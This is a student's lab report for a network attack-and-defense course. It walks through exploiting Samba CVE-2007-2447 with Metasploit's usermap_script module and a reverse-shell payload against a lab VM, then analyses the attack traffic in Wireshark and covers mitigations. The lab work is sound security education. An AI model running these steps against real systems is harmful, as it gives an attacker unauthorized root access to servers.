20253919 2025-2026-2 《网络攻防实践》第7周作业
实践内容
- 使用Metasploit进行Linux远程渗透攻击
CVE-2007-2447 是 Samba 历史上最知名的高危漏洞之一,因默认关闭配置项且需特定版本,现网暴露面已极低,但在老旧内网 / 工控 / 遗留系统中仍可能遇到。核心风险是认证前的无过滤用户输入直接带入 Shell 执行,防护核心为禁用非必要脚本映射 + 版本升级 + 网络隔离。 - 攻防实践
实践过程
使用Metasploit进行Linux远程渗透攻击
- 打开msfconsole
![image]()
- use exploit/multi/samba/usermap_script使用该模块进行攻击
![image]()
- show payloads查看载荷
![image]()
- set payload cmd/unix/reverse设置双向载荷
- 输入set RHOST 192.168.200.30 设置靶机的地址
- 输入set LHOST 192.168.200.14 设置攻击机地址,
![image]()
- 输入run执行渗透攻击
![image]()
- 可以看到已成功获取靶机权限
![image]()
攻防实践
- 攻击方重复任务一操作
- 输入whoami,可以看到已获取root权限
![image]()
- 防守方通过wireshark进行抓包操作,并分析抓包文件
![image]()
- 攻击者 IP 192.168.200.14
- 目标 IP:192.168.200.30
- 目标端口:139(SMB 服务端口,Samba 文件共享服务默认端口)
- 后续反弹 Shell 建立的端口为4444(攻击机的监听端口,靶机主动回连)
- 攻击发起时间抓包中第1个数据包的时间戳:0.000000000 也就是本次攻击会话的起始时间,后续所有流量都基于这个时间轴。
- 攻击利用的漏洞:结合抓包里的 SMB 交互特征(Session Setup AndX Request、Error响应,以及 Metasploit 攻击 Samba 的典型场景),可以确定是:CVE-2007-2447
漏洞原理:Samba 服务在处理用户名映射脚本时,未对输入进行安全过滤,攻击者可以通过构造恶意的 SMB 请求,注入任意系统命令,实现无权限远程代码执行。
属于Metasploit 最经典的 Samba 攻击模块,对应模块为 exploit/multi/samba/usermap_script。 - 使用的 Shellcode:本次攻击使用的是 Metasploit 框架内置的Linux 反弹 Shellcode,核心功能是让靶机主动回连攻击机的4444端口,建立交互式命令行会话
- 通过追踪TCP流,可以发现攻击方进行了ifconfig和whoami操作
![image]()
学习中遇到的问题及解决
- 问题:在相同网关VMNet8下,kali机无法成功ping通Metasploitable_ubuntu靶机
- 解决方案:重新配置Metasploitable_ubuntu靶机,重新配置其IP地址为192.168.200.30,问题解决
![image]()
实践总结
通过学习 usermap_script 安全漏洞(CVE-2007-2447),我了解到该漏洞是 Samba 服务因配置不当、未过滤特殊字符导致的远程命令注入漏洞,无需认证便可被恶意利用获取服务器权限,同时掌握了漏洞成因、利用方式,也学会了通过关闭危险配置、升级程序、限制端口访问等手段进行防护修复,深刻认识到老旧软件与不合理配置带来的网络安全风险,提升了网络安全防护意识。











浙公网安备 33010602011771号